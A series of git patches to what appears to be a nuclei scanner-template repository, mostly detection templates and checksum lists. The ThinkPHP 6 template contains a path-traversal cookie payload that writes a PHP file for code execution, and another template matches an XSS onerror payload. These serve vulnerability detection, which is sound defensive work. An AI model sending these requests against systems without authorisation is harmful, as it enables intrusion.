No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 7321abbfc2..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022027fc033c62acd2f8e150ce06984519dc5e2338f3f770f4649c608ce13cafc559022100bc9da6793d0f4c730d18dbebe947a008a983b33d5e2445f6cb016892a5013620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 62c53389a6..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ea89c85316fe6d4c73260cb398ec2a998e24a6919ae67740ff74e51a3e7aa00022100fcaeb222cff624ac92e1c9f50436df30f6db6773b1144c70d60f1173b72a3298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index f609078cdc..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f6a947b09ff502308ab7abd8d8acede529a5d5e6ac3cb0ed798a64d75f89f7a502205463a65e9745559f9366a4541dd1eb84c4f04042a894b5b560924fda2501c5ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 79537bdf7d..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220195fafe9110f58816bf359a1174513de6e822250648526ac465afa5c8932fab002206465fe56ff63378815abacccad53f12d45ed15c847aa2e9a05e566039fb8f66d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 38ad5adfa8..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3d2fb69cb58332b88435efb1f278778c7a8b941f40ed50b244c84ec7932b6a2022100adf9f027a5bba0359edf4def0f9773b537982176eb08daaaec8e1d9b66c83faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index c5cb3541a3..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100923e0895fe1756e883ea5abd3bcd447b9b5f41e2a954391aa1a0d57a47f57a9902204a008203e92a44a9afd505d091b434716a9cabf6397b083c64156721d98c651e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 6f9cef6f61..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220599eb80a8e8b4f50babfec560324e3ef026644cf35beaed13e098fa2d0b1ae9f02202a46209c10dc2d2ca1df7151b2077e53391ff1c5768fbecd6a5e0c53c057f41d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 66084c8e71..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039d58dfbfe81cd786efa9f57c12d8e632e11ec624ced0511c700f1967d2a581c02201af6b5c6b353ecd310d1406b90130ec545fdaf5aa5d8557bc7576419ca91d83f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ac98b3405d9b1d216d51027e5c4178627713da7d Mon Sep 17 00:00:00 2001 From: Icaro Torres <18042205+icarot@users.noreply.github.com> Date: Mon, 22 Jul 2024 23:09:37 -0300 Subject: [PATCH 1514/1841] Create apache-gravitino-detect.yaml Detects a Apache Gravitino web application, world's most powerful open data catalog for building a high-performance, geo-distributed and federated metadata lake. --- .../apache/apache-gravitino-detect.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/technologies/apache/apache-gravitino-detect.yaml diff --git a/http/technologies/apache/apache-gravitino-detect.yaml b/http/technologies/apache/apache-gravitino-detect.yaml new file mode 100644 index 0000000000..0bb850ea68 --- /dev/null +++ b/http/technologies/apache/apache-gravitino-detect.yaml @@ -0,0 +1,31 @@ +id: apache-gravitino-detect + +info: + name: Apache Gravitino - Detect + author: icarot + severity: info + description: | + Detects a Apache Gravitino web application, world's most powerful open data catalog for building a high-performance, geo-distributed and federated metadata lake. + metadata: + max-request: 1 + vendor: apache + product: gravitino + shodan-query: title:"Gravitino" + tags: tech,gravitino,apache,detect + +http: + - method: GET + path: + - "{{BaseURL}}/ui/metalakes" + + matchers-condition: and + matchers: + - type: word + words: + - 'Gravitino' + - 'gravitino' + condition: and + + - type: status + status: + - 200 From 3d9e86df0a6a2b18e01490c9270ba0d63ace42ef Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Jul 2024 10:59:49 +0530 Subject: [PATCH 1515/1841] fix 2nd req --- .../thinkphp/thinkphp6-arbitrary-write.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml b/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml index 7ea003cefc..2bda8e88e3 100644 --- a/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml +++ b/vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml @@ -1,15 +1,18 @@ id: thinkphp6-arbitrary-write info: - name: ThinkPHP 6.0.0~6.0.1 - Arbitrary file write + name: ThinkPHP 6.0.0~6.0.1 - Arbitrary File Write author: arliya severity: critical - description: ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string + description: | + ThinkPHP 6.0.0~6.0.1 is susceptible to remote code execution. An attacker can upload any script file through this vulnerability to realize remote code execution takeover.We inject payload into PHPSESSID. In the buggy version, the payload is url encoded and returned as it is. In the fixed version, the payload is returned as a 32-bit hexadecimal string reference: | - https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591 - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write - https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml metadata: + verified: true + max-request: 2 shodan-query: title:"ThinkPHP" tags: thinkphp,file-upload,rce @@ -23,8 +26,9 @@ http: Host: {{Hostname}} Cookie: PHPSESSID=/../../../public/{{random_filename}}.php Content-Type: application/x-www-form-urlencoded + - | - GET /{{random_filename}}.php + GET /{{random_filename}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and From 6d4e6c28f8d0e75161e21a5dbdf75d198238a4f9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Jul 2024 12:02:20 +0530 Subject: [PATCH 1516/1841] Update checkmarx-panel.yaml --- http/exposed-panels/checkmk/checkmarx-panel.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/checkmk/checkmarx-panel.yaml b/http/exposed-panels/checkmk/checkmarx-panel.yaml index 71b8b342bc..2c47d6ed1d 100644 --- a/http/exposed-panels/checkmk/checkmarx-panel.yaml +++ b/http/exposed-panels/checkmk/checkmarx-panel.yaml @@ -4,14 +4,15 @@ info: name: Checkmarx Login Panel - Detect author: joanbonon,righettod severity: info - description: Checkmarx login panel was detected. + description: | + Checkmarx login panel was detected. reference: - https://docs.checkmarx.com/en/34965-44074-checkmarx-sast.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 + max-request: 3 verified: true shodan-query: http.html:"CxSASTManagerUri" tags: panel,checkmarx,detect,login From 2223d418fdae3ba4d12d3486ca4d00d686a76f2a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Jul 2024 12:05:38 +0530 Subject: [PATCH 1517/1841] Create sftpgo-admin-setup.yaml --- http/misconfiguration/sftpgo-admin-setup.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/sftpgo-admin-setup.yaml diff --git a/http/misconfiguration/sftpgo-admin-setup.yaml b/http/misconfiguration/sftpgo-admin-setup.yaml new file mode 100644 index 0000000000..e7b9573442 --- /dev/null +++ b/http/misconfiguration/sftpgo-admin-setup.yaml @@ -0,0 +1,31 @@ +id: sftpgo-admin-setup + +info: + name: SFTPGo Admin - Setup + author: ritikchaddha + severity: high + description: | + SFTPGo Admin Password setup page has been exposed. + metadata: + max-request: 1 + verified: true + fofa-query: title="SFTPGo - Setup" + tags: sftpgo,misconfig,setup + +http: + - method: GET + path: + - "{{BaseURL}}/web/admin/setup" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'SFTPGo - Setup' + - 'SFTPGo you need to create an admin user' + condition: or + + - type: status + status: + - 200 From 61a50f78261afa354176f41d0847281f1679e8bd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Jul 2024 12:12:31 +0530 Subject: [PATCH 1518/1841] updated matcher --- http/cves/2022/CVE-2022-38322.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-38322.yaml b/http/cves/2022/CVE-2022-38322.yaml index b1f88d9309..7a6de982b4 100644 --- a/http/cves/2022/CVE-2022-38322.yaml +++ b/http/cves/2022/CVE-2022-38322.yaml @@ -1,7 +1,7 @@ id: CVE-2022-38322 info: - name: Temenos Transact - Reflected Cross-Site Scripting (XSS) + name: Temenos Transact - Cross-Site Scripting author: qotoz severity: high description: | @@ -26,6 +26,11 @@ http: words: - setupHelp('')" onerror="confirm('document.domain') - - type: status + - type: word + part: content_type + words: + - 'text/html' + + - type: status status: - 200 From 5ced6de37f476f5699a96129c04b3a5955bf64ca Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Jul 2024 12:15:46 +0530 Subject: [PATCH 1519/1841] lint fix --- http/cves/2022/CVE-2022-38322.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-38322.yaml b/http/cves/2022/CVE-2022-38322.yaml index 7a6de982b4..b8ff4f6ce3 100644 --- a/http/cves/2022/CVE-2022-38322.yaml +++ b/http/cves/2022/CVE-2022-38322.yaml @@ -31,6 +31,6 @@ http: words: - 'text/html' - - type: status + - type: status status: - 200 From 45de8caff76c2dd0c1c25778bdfe75688c682370 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 23 Jul 2024 12:15:50 +0530 Subject: [PATCH 1520/1841] Create fluent-smtp.txt --- helpers/wordpress/plugins/fluent-smtp.txt | 1 + 1 file changed, 1 insertion(+) create mode 100644 helpers/wordpress/plugins/fluent-smtp.txt diff --git a/helpers/wordpress/plugins/fluent-smtp.txt b/helpers/wordpress/plugins/fluent-smtp.txt new file mode 100644 index 0000000000..ceadef46d3 --- /dev/null +++ b/helpers/wordpress/plugins/fluent-smtp.txt @@ -0,0 +1 @@ +2.2.80 From a48a699b1bdcdf6b66e06373eab816ef0be0fd62 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 06:49:10 +0000 Subject: [PATCH 1521/1841] Auto Generated New Template Addition List [Tue Jul 23 06:49:10 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index d310a86fd7..04dd86df06 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ headless/2024/CVE-2024-38526.yaml http/cnvd/2023/CNVD-2023-72138.yaml +http/cves/2022/CVE-2022-38322.yaml http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-29204.yaml http/cves/2023/CVE-2023-4220.yaml @@ -35,6 +36,7 @@ http/misconfiguration/installer/adguard-installer.yaml http/misconfiguration/installer/freshrss-installer.yaml http/misconfiguration/servicenow-title-injection.yaml http/technologies/apache/apache-ozone-detect.yaml +http/technologies/wordpress/plugins/fluent-smtp.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 9cbc9a11574898bf904f25f8bdf644e6f8056b9c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 06:49:19 +0000 Subject: [PATCH 1522/1841] Auto Generated Templates Checksum [Tue Jul 23 06:49:19 UTC 2024] :robot: --- templates-checksum.txt | 423 +++++++++++++++++++++-------------------- 1 file changed, 213 insertions(+), 210 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8e7a61c463..462076e609 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -674,7 +674,7 @@ file/webshell/asp-webshell.yaml:3d5fd63aebe784dc4f49b04478b7fef5f4e9e2c2 file/webshell/jsp-webshell.yaml:2d750d74431e61570c7d96d5ffeb4353d3820a1d file/webshell/php-webshell.yaml:8465f2abe6a2b13a2f3ceaa3c277a7fdebdfaa41 file/xss/dom-invader-xss.yaml:9b911e2d4de98274f413c9a6a6689a4609c66eaa -headless/2024/CVE-2024-38526.yaml:316354870609900da82934d7fac7f4c8ee9b36e8 +headless/2024/CVE-2024-38526.yaml:7399dd82e5f7da114558259c3e0c81f63d8fe030 headless/cves/2018/CVE-2018-25031.yaml:d1b98330ac63ebee28a14fc633dafbf039ed6c48 headless/dvwa-headless-automatic-login.yaml:4c1f2437b541a83dfda0e1239995b08a0315e478 headless/extract-urls.yaml:499408f8b8d77cb5315ed584ac23c90328823a3f @@ -769,7 +769,7 @@ helpers/wordpress/plugins/complianz-gdpr.txt:47c3ed69e5609d2452fff4d1fa775f2f0aa helpers/wordpress/plugins/contact-form-7-honeypot.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/contact-form-7.txt:9ed846d0f4da601ec302229b03808fcd2b2290ea helpers/wordpress/plugins/contact-form-cfdb7.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 -helpers/wordpress/plugins/cookie-law-info.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 +helpers/wordpress/plugins/cookie-law-info.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/cookie-notice.txt:5b3fa59c8d983303bb4380265de5153b897ee87d helpers/wordpress/plugins/copy-delete-posts.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 @@ -797,6 +797,7 @@ helpers/wordpress/plugins/facebook-for-woocommerce.txt:f94488dae421ac2a8aae98632 helpers/wordpress/plugins/fast-indexing-api.txt:9179d5509f8564f9a9b7411a76b338ec2a3b721c helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:555a5c5c92b230dccab828d90e89ec66847ab9ce +helpers/wordpress/plugins/fluent-smtp.txt:66a3a22f1993f1dc323109ac736fb1fa2c02e37f helpers/wordpress/plugins/fluentform.txt:62816587b37c8a986e8470456cb1ccaca418bd38 helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 @@ -834,7 +835,7 @@ helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4a68a369b09b39005e13232e5dfd62ba1526b55d helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/litespeed-cache.txt:3a108f8e498bd0c9790af41f7f7d8093515044ff +helpers/wordpress/plugins/litespeed-cache.txt:03c10c50990743199cc887aaacd3f88a0a0a026e helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/loginizer.txt:83057b5c2ba4158be4c360919fba39e92c0cd3ca helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 @@ -844,7 +845,7 @@ helpers/wordpress/plugins/mailpoet.txt:970defc3a5b51878c279d9b687b808ec0765df77 helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 helpers/wordpress/plugins/mainwp-child.txt:218d96849acd4f3914538408fbb4a3dca66ff25c helpers/wordpress/plugins/malcare-security.txt:eb5ffc0342cb0113a96a05c48dd1c79f3aa9174b -helpers/wordpress/plugins/megamenu.txt:054dae9d64c38d76a066c981fbdab975b1abbf53 +helpers/wordpress/plugins/megamenu.txt:f85383fcd7c211714084d7fca897998d7d759c5d helpers/wordpress/plugins/members.txt:2beef4f1a38f9db1c05a1e49977c956626624d66 helpers/wordpress/plugins/meta-box.txt:d671e38ac88381575198332ef9ebb2b70b2841f4 helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 @@ -852,7 +853,7 @@ helpers/wordpress/plugins/ml-slider.txt:75c024ece33c58576c793ad8930682e902abfb64 helpers/wordpress/plugins/newsletter.txt:1367078ebee3d42232e6c2aaa74f83439f5d235e helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/nextgen-gallery.txt:b4965036e178930c67affe46a8868c680bc27ea4 -helpers/wordpress/plugins/ninja-forms.txt:b551dceb18411def5ed66556a7d0855f82ba865f +helpers/wordpress/plugins/ninja-forms.txt:ff91f6a12c5b5d9b3000e730864aa8f2141aa975 helpers/wordpress/plugins/ocean-extra.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 helpers/wordpress/plugins/official-facebook-pixel.txt:49f9230a0175e58b6964e60aa97809134e03c8ae helpers/wordpress/plugins/one-click-demo-import.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b @@ -899,7 +900,7 @@ helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23 helpers/wordpress/plugins/tablepress.txt:98a16af997b52cb888232ab5d79a527b0716561c helpers/wordpress/plugins/taxonomy-terms-order.txt:d176141136f1fe969aeca56eb98e3734f24199ae helpers/wordpress/plugins/templately.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/the-events-calendar.txt:6edccbf589807e4171353b69b32d148fb22948d3 +helpers/wordpress/plugins/the-events-calendar.txt:18550ee15e4dfc3c7876ce760f9fc97cb5a54592 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:036622d5a32b0e5099f20d8cff7515dc042253aa @@ -918,10 +919,10 @@ helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:5e0ad8390d778d86a4a3 helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d20e6b799a7bc47bbdd80029ea94c45fd2d40b68 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 -helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:373c54d47cc406011bd3964962f1e869d501afa4 +helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:33e208e824cddc9444184f3b33cdfe7045499ff7 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c helpers/wordpress/plugins/woocommerce-payments.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 -helpers/wordpress/plugins/woocommerce-paypal-payments.txt:036622d5a32b0e5099f20d8cff7515dc042253aa +helpers/wordpress/plugins/woocommerce-paypal-payments.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:b551dceb18411def5ed66556a7d0855f82ba865f helpers/wordpress/plugins/woocommerce-services.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/woocommerce.txt:4fb032eb953a74896b4877c6950fc07e329c2a70 @@ -946,7 +947,7 @@ helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7 helpers/wordpress/plugins/wp-seopress.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c -helpers/wordpress/plugins/wp-statistics.txt:7915b1aaf21d82ad463ef814d16832b49d63dddd +helpers/wordpress/plugins/wp-statistics.txt:8547686c44d1287856fe952f839075580fe279ad helpers/wordpress/plugins/wp-super-cache.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 @@ -2870,6 +2871,7 @@ http/cves/2022/CVE-2022-3800.yaml:a700c9264ffbedb46a2f3a22ec7e98be500097c5 http/cves/2022/CVE-2022-38131.yaml:49cadbb0bb2d72895fe3281f98c67e1332d50025 http/cves/2022/CVE-2022-38295.yaml:e935234c93f236f44ebedc6ec81801116b26d54b http/cves/2022/CVE-2022-38296.yaml:236c15b302eedb112d21bc64a388b0d716416755 +http/cves/2022/CVE-2022-38322.yaml:640c129a9962ce478a6a496944284346866c68f5 http/cves/2022/CVE-2022-38463.yaml:70a4b47b359c9e8ee1b0ce6199a3b6025de0d330 http/cves/2022/CVE-2022-38467.yaml:4169be779f0b8254f3f7ce902339096ba486b03c http/cves/2022/CVE-2022-38553.yaml:6bb6d72813bfba832f77273ab2d04a4c7ce2d5bf @@ -4122,7 +4124,7 @@ http/exposed-panels/h2console-panel.yaml:6e82b0ef42df590b8821cd1426b523c2500e1fb http/exposed-panels/hadoop-exposure.yaml:bfca529fe512a140ebddad48a53520d26828a304 http/exposed-panels/haivision-gateway-panel.yaml:e3dc0e5ab37474032fd9076a6cd028e89b265f1b http/exposed-panels/haivision-media-platform-panel.yaml:3ec9207b4e891b6080b30c3fcee72ccdfaff36e7 -http/exposed-panels/hal-management-panel.yaml:8bb63d680703ac8da50bd72e293096917a8a24ef +http/exposed-panels/hal-management-panel.yaml:2c2394d5b8058d4153fe4e74eef6f9667a29f53e http/exposed-panels/hangfire-dashboard.yaml:dd2cef1642c3715d27adfacee1a32926de84fcee http/exposed-panels/harbor-panel.yaml:5f8ab6b28043fcb08bfd1b5c6d41b82995b0f3fa http/exposed-panels/hashicorp-consul-agent.yaml:3c36d773243e3c180d343ce0fb640fe12abb0ca2 @@ -7309,229 +7311,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:c5adda802b407d70341e71e61d5cd6c8899f4a91 -http/technologies/wordpress/plugins/add-to-any.yaml:77f9cfef56d9531c2787a8b631472ec833e22b76 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:946cd00a1faafe206adaa44a29f2d6afa71c1609 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:1fa8ef8cc10746d80586ad02d8fe81007140be3e -http/technologies/wordpress/plugins/akismet.yaml:f0406756c5e1b08de5f134e9eb34a07d7a6092b2 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:7a29a04a2f233eef2daebd14d88e0070072ba00a -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:d65e6400ad64470147de281ba457cf8bc899d99b -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f8a54c5014dabe34bd9d4f37bfa72b4b81bcd4b9 -http/technologies/wordpress/plugins/amp.yaml:9b372638128c0e2f70a40f0735c227fc361809c4 -http/technologies/wordpress/plugins/antispam-bee.yaml:2a90ecdb459d4275f0a878d7e86f7133adddad43 -http/technologies/wordpress/plugins/astra-sites.yaml:0bba9bbd8164f43aee997302ba193961c76bdea0 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:8d0fbab1f4b82811e437971f22c59b35b05d4f56 -http/technologies/wordpress/plugins/backwpup.yaml:b85b0ac11e48796ab647a41758960dda8e3ba52e -http/technologies/wordpress/plugins/better-search-replace.yaml:ff5148b91490a8c21792c647c2b378aeb2239909 -http/technologies/wordpress/plugins/better-wp-security.yaml:be4a16258cb1a9c7d8550d954912966ad1b7a613 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:a20fedf4e6e37183f486d770a2cc416a3945e140 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:3aed2c78d1600df497de42b20da2ca8210c8f97f -http/technologies/wordpress/plugins/breeze.yaml:0866d8b0ec62438666fcc91591a36025a1e1e800 -http/technologies/wordpress/plugins/broken-link-checker.yaml:b16fe4c9e104a1c8138a4777e7b8c71469d3e0ff -http/technologies/wordpress/plugins/chaty.yaml:37b2925071ba5d8fffe424aae475c78ffc0368f6 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:37478bd08f5b42672f1cbedbdd121ed3bdf2f2dd -http/technologies/wordpress/plugins/classic-editor.yaml:de9780574fe089f70cb4592531c2fcb9aceaa743 -http/technologies/wordpress/plugins/classic-widgets.yaml:fb6313919dcbb46701853e3c16b1be4c7778ede5 